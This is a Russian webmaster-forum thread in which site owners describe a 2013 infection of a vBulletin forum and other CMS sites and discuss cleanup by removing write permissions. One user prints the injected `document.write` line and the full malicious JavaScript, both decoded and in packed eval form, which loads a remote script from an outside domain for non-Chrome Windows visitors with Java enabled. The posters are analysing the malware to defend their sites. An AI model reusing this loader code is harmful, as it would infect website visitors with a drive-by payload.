netwind, сколько ни читаю ваших сообщений в теме - Вы по делу ровным счётом ни одного слова не написали. Сплошная каша, размазанная по тарелке. Поэтому лучше своё время поэкономьте.
В предыдущем посте я писал то, что делал для обезвреживания вирусни. В итоге Гугл наконец-то разблокировал мой сайт. А Яндекс в моём случае тоже вообще не ругался на вирус, видимо "Платоны" действительно пока не в курсе.
Спасибо за инфу, весьма вероятно что эту или какую-либо другую уязвимость в пхп использует вирус. Надо хостера попинать)
Тем временем продолжаю изучение вируса (на примере VBulletin 4.2.X)
Возможно у вас вирус действует иначе, но на моём сайте хронология действий вируса следующая:
1. Хаотично в определённую, имеющую право на запись папку заливается php, который также имеет ничего не значащее имя. Затем, как я предполагаю, данный php используется для загрузки js-файла. js также записывается в случайную папку.
2. Происходит изменение ключевых php и js скриптов сайта, путём добавления в них строки вида:
;document.write("<scr"+"ipt src='/images/cheet.js'><"+"/script>");
Опять же на примере "Булки", вставка добавлялась в файлы index.php, content.php, yuiloader-dom-event.js, vbulletin-core.js, vbulletin_cms.js - таким образом внедрённый в главные файлы вредоносный js выполнялся у каждого пользователя, посещавшего сайт.
3. Вирусная программа с определённой периодичностью делала запросы к сайту, проверяя наличие php. И в случае необнаружения файла заливала всё заново, но в другие места и с другими именами. Помимо всего прочего, могла иметь место подмена файлов js, т.е самой же программой файл удалялся и заливался другой. Это могло быть сделано для запутывания пользователя, ну либо были какие-то другие цели.
Ещё имел место swf-файл, заливавшийся вместе с php и js, однако какую роль в этой истории играет swf я пока не додумался.
Короче говоря, надо поставить запрет на запись ключевым php и js-скриптам (а лучше вообще всем сайтовым php и js). Ибо если в файлах сайта нет вирусной вставки, то и вызов левого js будет невозможным.
Но у себя я пока также держу и все папки под запретом на запись.
Пока так.---------- Добавлено 17.12.2013 в 19:00 ----------Ах да, для "булочников" совет: в админке запустите диагностику. Она выявит изменённые файлы (особое внимание обратите на файлы с пометкой "не содержит ожидаемого содержимого").
netwind, кто что написал? Где? Как например зачистить вирус на ВБуллетин? Переустанавливать движок? Какой в этом смысл, если я вижу что все файлы и так родные и следов пребывания вируса в скриптах стиля тоже нет. Что и где зачищать-то?) И ещё Вы видели, чтобы тут кто-нибудь отписал что решил эту проблему? По-моему люди как раз пишут, что вирус продолжает грузить вредоносные файлы.
Ну вдруг если расшифровать коды js и php, то мы поймём что это за вирус хотя бы. Тут нужен знающий человек, разбирающийся в программировании. А то пока воз и ныне там, никаких сподвижек в решении проблемы. Вирус продолжает безчинствовать...---------- Добавлено 17.12.2013 в 13:55 ----------В общем через спец.сервисы для декодирования скриптов расшифровал код вирусного js, вот так код выглядит в отформатированном виде:
function includeJavascript(src) { if (document.createElement && document.getElementsByTagName) { var head_tag = document["get" + "Elem" + "ents" + "By" + "TagN" + "ame"]('head')[0]; var script_tag = document.createElement('script'); var UbKrJupg0 = "?@34l^x$46"; var UbKrJupg1 = "L0zk&*1,e_;H<BE*J"; var UbKrJupg2 = "$-A#4_$%O2}"; var UbKrJupg3 = "&$<-]t368$^:%?*"; var UbKrJupg4 = "QTV[C}P-~%+)w_x=?=!PX}"; script_tag.setAttribute('type', "t" + "e" + "xt/" + "ja" + "va" + "scr" + "i" + "pt"); script_tag.setAttribute('src', src); var tHpwoAu0 = ";g9?zgsd^7?,i"; var tHpwoAu1 = "DYRFEhN() 4}{"; var tHpwoAu2 = "_x*,)dfi]cciN-~"; var tHpwoAu3 = "N^lu(,?[;/+Y1G"; var tHpwoAu4 = "3+%{4o)IVv5x1Mk6dEChJGfrJ"; head_tag["a" + "pp" + "e" + "nd" + "C" + "hi" + "ld"](script_tag) } } function cond3() { return navigator.javaEnabled() } var zYenOhARw0 = "@{+&4{.@$TZ6sUJM*0n"; var zYenOhARw1 = "6P<%T[5#;e!L~q#8{2]"; var zYenOhARw2 = ")D}~4-90/!shuQ2"; var zYenOhARw3 = "}L1@~#I- h3!!`~<"; var zYenOhARw4 = "6/E;sx#s}>/9wI*pJ>+J"; function isWin(ua) { return ua.indexOf(win) != -1 } var rzMACRgZJT0 = "9cjo)<e)@0 l}"; var rzMACRgZJT1 = "/d<f9#5~=pPl"; var rzMACRgZJT2 = "t8+}GoK-yhfAqm%"; var rzMACRgZJT3 = "~>{$cAVk:*_zTQ!"; var rzMACRgZJT4 = ",tp<,Qd{e9^/T?"; var url = "ht" + "tp" + ":/" + "/y" + "da" + "xy" + "ko" + ".p" + "p." + "ua" + "/2" + "6c" + "2e" + "8e" + "59" + "08" + "e7" + "84" + "51" + "f8" + "23" + "0b" + "f5" + "1a" + "94" + "6d" + "74" + "91" + "51" + "fa" + "ea" + "b9" + "75" + "09" + "c2" + "39" + "b4" + "1b" + "94" + "94" + "3e" + "03" + "3c" + "35" + "73" + "ec" + "da" + "d9" + "9e" + "e0" + "67" + "8a" + "5c" + "e4" + "83" + "10" + "d9" + "f9" + "61" + "e9" + "e0" + "b8" + "cf" + "61" + "91" + "34" + "bd" + "45" + "41" + "13" + "9e" + "28" + "32" + "40" + "49" + "55" + "2b" + "84" + "a3" + "eb" + "54" + "14" + "51" + "0b" + "e5" + "fa" + "41" + "93" + "9f" + "2a" + "73" + "fe" + "16" + "25" + "f7" + "d0" + "22" + "f7" + "6e" + "23" + "32" + "48" + "51" + "36" + "87" + "9f" + "27" + "36" + "c0" + "66" + "05" + "7a" + "d9" + "07" + "0d" + "5b" + "39" + "f0" + "e4" + "3a" + "36" + "35" + "3e" + "02" + "70" + "28" + "df" + "4b" + "f8" + "db" + "ef" + "39" + "e3" + "e6" + "e5" + "05" + "ac"; var win = "w" + "in"; var OzygqXdg0 = "+?<F#X-U5`j"; var OzygqXdg1 = "Dfw(,#&IC*$"; var OzygqXdg2 = "L_q6S*Pbr-*^b>/"; var OzygqXdg3 = " ][8b$K 6*3Z^8+"; var OzygqXdg4 = "}Y.;SV$w/0#8f~1,"; function notChrome(ua) { return ua.indexOf("c" + "h" + "ro" + "me") == -1 } function includeCounter() { var ua = navigator["userAgent"]["to" + "Lo" + "we" + "r" + "Ca" + "se"](); if (notChrome(ua) && isWin(ua) && cond3()) { includeJavascript(url) } } includeCounter();
Если кто умеет скрипты расшифровывать, может подскажете что выполняет этот код? (код из js-файлов, которые подсаживает вирус)
eval(function(p,a,c,k,e,d){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--){d[e(c)]=k[c]||e(c)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('l 11(A){10(m.17&&m.1v){2 Z=m["1r"+"2z"+"2u"+"2P"+"2c"+"27"](\'2j\')[0];2 u=m.17(\'2A\');2 2k="I)%`0?];y-6!}U+P?*";2 2i="k#7~g;2g-!5";2 2h="v?[2l~~`[/2m";2 2q="!+y(U@2p<]2o#N";2 2n="j`2e~C~`2d$";u.F(\'25\',"t"+"e"+"24/"+"21"+"1Y"+"1Z"+"i"+"26");u.F(\'A\',A);2 2b="! )+29{i$U}g";2 28="M &14!E&{^";2 2r="[]?%}+.2s~/^7+#";2 2K="2J:.2I<2G~`2H`Y*Q`";2 2L="2M,.~2Q!2O$2N#2F";Z["a"+"2x"+"e"+"2w"+"C"+"2v"+"2t"](u)}}l 18(){D 12.2y()}2 2D="!!!M:2C`2B(`1X{6";2 2R="#1O>1q!*<=`-[/:}o!`1p";2 1o="!%1m&~@1n?5#)(1s";2 1w="P=~4).1l~22#1t^ S>1x";2 1b="1g}%p(p;,9.z}1c.";l 15(d){D d.O(L)!=-1}2 1k="S 1h%&;8+:1$6";2 1j="S!1i^7{?1%n:";2 1u="1W~E-3m/1P;1y";2 1N="*1M.}P,1Q";2 1R="1V-1U:1T:!";2 19="1S"+"1L"+":/"+"/o"+"1K"+"1D"+"1C"+".p"+"p."+"d"+"/5"+"38"+"T"+"1B"+"B"+"1z"+"1A"+"1E"+"1F"+"31"+"1J"+"B"+"1d"+"1I"+"1H"+"1a"+"2S"+"H"+"1G"+"2E"+"X"+"40"+"3f"+"3Q"+"20"+"R"+"38"+"3S"+"x"+"3T"+"3c"+"J"+"W"+"J"+"3U"+"3e"+"3N"+"16"+"3F"+"3I"+"14"+"2f"+"3M"+"3Y"+"x"+"3K"+"3X"+"4a"+"49"+"48"+"4b"+"46"+"45"+"23"+"47"+"V"+"42"+"H"+"V"+"3Z"+"3L"+"3D"+"W"+"2a"+"39"+"44"+"3a"+"R"+"1e"+"3h"+"1a"+"B"+"3g"+"35"+"x"+"x"+"34"+"33"+"2W"+"2V"+"2U"+"1f"+"2T"+"2a"+"2X"+"2Y"+"32"+"30"+"T"+"2Z"+"20"+"3i"+"2a"+"3w"+"3y"+"3z"+"3C"+"3B"+"3A"+"f";2 L="w"+"3u";2 3t="[[3l))f~3k";2 3o="6}3s[.;}G&";2 3q="3b+b!<X-*z=/3r=3p[s}?3";2 3n="@r/-4:(q?4.3v 3x 3j;o";2 3d="3}3E< :36~37?%#41;43+P";l 13(d){D d.O("c"+"h"+"3J"+"3G")==-1}l K(){2 d=12["3H"]["3O"+"3V"+"3W"+"r"+"3P"+"3R"]();10(13(d)&&15(d)&&18()){11(19)}}K();',62,260,'||var|||||||||||ua||||||||function|document||||||||script_tag|||b7|||src|b1||return||setAttribute||7a||a2|includeCounter|win|||indexOf|||ac||7e||50|76|e0||head_tag|if|includeJavascript|navigator|notChrome||isWin||createElement|cond3|url||ZVKpaplM4|vS||||_e_|3_LMI|wE|SRyxyZhC1|SRyxyZhC0|Om36|yb|rh3|ZVKpaplM2|uSS|lG0I|get|u0|9_|SRyxyZhC2|getElementsByTagName|ZVKpaplM3|k3A|iRS|f0|f9|c5|le|ly|67|cc|51|7c|9f|01|la|tp|2N_1|SRyxyZhC3|U7u|i7|YAI9|SRyxyZhC4|ht|C60|fXmu|k9|xrr|6k|va|scr||ja|||xt|type|pt|ame|FBmEvxI1|JZ||FBmEvxI0|TagN|_2dit|wX||HDs99hR|JpHMjsU2|JpHMjsU1|head|JpHMjsU0|8P|IO|JpHMjsU4|hvu|eg|JpHMjsU3|FBmEvxI2|HlzwK|ld|ents|hi|nd|pp|javaEnabled|Elem|script|o8|Pxp8|ZVKpaplM0|d6|iq|KP|X55|TP|b7a|FBmEvxI3|FBmEvxI4|6d5|U4R|51Oj_|By|l_q|ZVKpaplM1|ed|d1|91|cf|e3|b4|ff|e6|9a||72|0e|97||vp1o2|rm9||ae|a8|h3||cUFPNG4|||6f|f4|64|ay7|160|o87Dr||cUFPNG3|cUFPNG1|feS|cUFPNG2|uE|t49|cUFPNG0|in|_7|81|_o|92|b5|99|f8|0c|ea|7O|9e|me|userAgent|c9|ro|a7|84|c1|d7|to|Ca|8a|se|73|70|eb|Lo|we|59|bd|09||A53|62|Qz||83|d8||5e|7f|f2|aa'.split('|'),0,{}))
ProLiant, либо оставьте этой папке возможность на запись, если это так необходимо. Ну либо вручную по фтп заливайте картинки в эту папку, после чего обратно выставляйте папке запрет на запись. Это на Ваше усмотрение, лично я закрыл всё и ничего менять не буду пока не проясню ситуацию с этим говно-вирусом.
Поискал эту инфу в инете, ничего толкового не нашёл. Предлагаю тогда на все папки сайта выставить запрет на запись. Другого решения на данный момент не вижу. Жаль, что опытные вебмастера не оказывают поддержку в решении проблемы. Надо обратиться на другие форумы.
Может кто знает как в хтакцесс прописать запрет на загрузку файлов определённого разрешения? Чтобы хотя бы остановить вирусню, пока не иниициируем проблему.---------- Добавлено 16.12.2013 в 21:58 ----------*определённого расширения, хотел сказать)
ProLiant, это да, заразе походу всё равно какой двиг - ДЛЕ, Друпал, Джомла... А у меня, забыл сказать, вообще ВБуллетин. Так что Булку тоже допишите в этот список.
У Вас какой хостинг, если не секрет? Я на джино с недавних пор переехал, экономлю)
